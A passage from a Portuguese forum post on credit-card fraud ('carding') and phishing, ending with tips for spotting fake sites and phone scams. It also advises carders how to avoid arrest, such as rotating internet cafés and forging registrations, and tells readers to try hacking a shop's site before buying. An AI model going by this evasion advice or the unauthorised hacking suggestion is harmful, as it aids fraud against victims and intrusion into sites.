papel. Ao terminar a ligação, ele colocou o guardanapo na frente do pai, que ficou olhando para o
número de boca aberta. O pobre senhor parecia totalmente chocado, como se todo o seu sistema de
confiança tivesse ido por água abaixo."

Interessante não? Veremos aqui exemplos de como agem os carders. Em todas essas histórias, eles foram bem-sucedidos. Agora veremos como não ser vítima desse tipo de ataque e o que o carder deve fazer para não ser preso.

A respeito do pishing, foi usado um pishing de site de comércio. Um pishing de banco da muito mais trabalho, pois o carder terá que estudar como o banco funciona, seu modo de autenticação, os formulários, as campanhas que faz, etc. Só assim ele fará um ataque perfeito sem que a vítima desconfie. Para mais informações, leia o capítulo 8 do Livro Proibido do Curso de Hacker do professor Marco Aurélio Thompson.

( 4 ) Perigos do carding/banking
Para o carder: Se o leitor analisou atentamente as técnicas descritas aqui, viu o trabalho que da não ser rastreado. Tendo que abrir um simples email, só em lan, tudo que for online não pode ser de casa. Além disso, ir em lans diferentes a cada vez, forjar cadastros, tomar cuidado com a policia federal e suas "armadilhas", escolher um tempo certo para "festejar o prêmio", etc. Um único deslize aqui, além de botar todo o plano por água abaixo, pode levar o carder a ser preso.

Para a vítima: Bom, não há muito o que se dizer aqui. Se o ataque do carder for bem-sucedido, a vítima sofrer um prejuízo financeiro tremendo, e até provar que ela não efetuo as comprar e alguém devolver o dinheiro dela, isso irí resultar em semanas de ódio, dor de cabeça e uma burocracia infernal com a policia, o procom, a loja, etc.

( 5 ) O principal: Como se proteger de ataques e golpes fraudulentos.
Bom, finalmente chegamos ao capítulo que vamos aprender a nos proteger. Vou mostrar de forma clara e rápida os cuidados a serem tomados para detectar e evitar um plano carder em ação:

(1-) Cheque a url de um site muito bem antes de clicar nela. Como vimos, os detalhes de um domínio fake para um verdadeiro são extremamente minuciosos.

(2-) Cheque a autenticidade de um email desconhecido antes de baixar anexos ou clicar em links estranhos.

(3-) Desconfie de pessoas que ligam dizendo que são de alguma empresa famosa. Ligue para lí para confirmar a existência da pessoa.

(4-) Ao fazer compras pela internet, e claro, após verificar se a página não é fake(veja atentamente seu código-fonte!), escolha a opção de pagar por boleto que é muito mais segura e não digite informações vitais em formulários de páginas suspeitas.

(5-) Tente hackear o site usando as técnicas mostradas aqui antes de comprar algo por ele. Caso obtenha sucesso e acesse informações vitais de usuários. Nem pense em comprar algo por ele. Cheque também a segurança do roteador e se o site usa uma criptografia descente.

(6-) Não clique em nada, não forneça nada e não execute comando algum em seu computador sem antes saber se aquela pessoa no telefone é realmente quem diz ser, se aquele email não veio de um servidor estranho, ou se aquela página web toda bonitinha não é algo fajuto para te enganar. Seja paranóico, pois nesse caso, a paranóia é a sua melhor amiga e também a sua segurança.

(7-) Tenha em mente que o carder tenta se informar sobre a vítima, então é provável que um malware como um cavalo-de-tróia ou keylogger venha em algo que interesse a vítima e não apenas em forma de site comercial ou site de banco. Pode ser uma mensagem falando que o artista favorito dela morreu e manda clicar em link (com keylogger claro) para ver a matéria completa, pode vir em forma de um programa engraçado que desperte a curiosidade da vítima ingênua, etc. Ingenuidade é o que o carder explora, assim como os gostos e características das pessoas que eles querem atacar Fiquem atentos!

Créditos: -K00D13

veronmaiden

Mensagens : 70
Data de inscrição : 02/08/2009

Ver perfil do usuário http://www.insecuritynet.com

Voltar ao Topo Ir em baixo

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

 
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum